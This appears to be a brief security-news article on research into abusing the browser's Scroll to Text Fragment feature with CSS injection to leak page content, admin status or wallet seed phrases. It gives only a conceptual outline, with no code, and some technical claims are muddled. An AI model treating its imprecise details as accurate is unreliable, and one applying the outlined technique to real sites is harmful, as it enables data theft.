Research says threat actors could exploit the Scroll to Text Fragment or STTF feature in web browsers to steal users’ sensitive data. This feature allows users to create links from the URL onto a specific webpage portion using the ‘#:~:text’ identifier.
From the studies about the STTF flaw, its operators use CSS selectors to collect specific information from the targeted webpage and then forward it to their C2 servers. Suppose a webpage is found with a CSS injection vulnerability. In that case, the attackers could engineer its style specifications, making the browser send exfiltrated data to a malicious server from the STTF feature’s attributes.
Rather than a feature flaw, the Scroll to Text Fragment is exploited due to malicious intents.
The researchers state that despite the security protocols designed for the Scroll to Text Fragment (STTF) feature, attackers could find ways to circumvent them and steal data from a victim’s webpage.
For instance, the threat actors could send a unique URL that reveals if their target is an administrator to their C2 servers. These attackers could also collect data from the current site that a target is using on their web browsers.
If a victim lacks cybersecurity awareness, threat actors could easily lure them through social engineering tactics, allowing them to abuse the STTF feature and steal data from the victim. In abusing STTF, the attackers must also exploit the victim’s web browser extensions to copy user clicks since it is required for the STTF feature to work.
Also, from a sample of a PoC that the researchers have shared, the STTF attack scheme could reveal a victim’s recovery seed phrase in their cryptocurrency wallets.
Attackers have two advantages to using the feature in attacks, including when they find a flaw on a website and need to target an administrator among all other unknown users; and when they know who their target is and seek any information they need to know about that victim.
Properly executed social engineering tactics allow attackers to abuse the Scroll to Text Fragment feature in luring their targets to visit a compromised webpage. Hence, developers are warned that these web browser features, such as the STTF, could also pose risks to users. Bugs that exist in CSS injections could compromise the users’ security.
Per usual advice, users must avoid clicking on suspicious links and update their software to apply patches on flaws that threat actors could abuse.
